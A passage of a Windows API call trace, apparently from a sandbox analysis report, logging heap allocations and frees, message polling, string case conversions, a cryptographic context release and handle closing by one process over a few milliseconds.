HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.267] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.267] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.267] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.267] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.267] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.267] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.267] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.267] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.267] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.267] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.267] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.267] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.267] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.267] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0088.268] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.268] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0088.268] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.268] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0088.268] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0088.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0088.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0088.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.272] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.272] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0088.272] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0088.273] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0088.273] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.273] FreeLibrary (hLibModule=0x76390000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0088.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.274] CloseHandle (hObject=0x2c4) returned 1 [0088.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0088.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0088.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0088.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0088.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0088.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0088.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0088.282] CloseHandle (hObject=0x294) returned 1 [0088.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0088.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0088.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 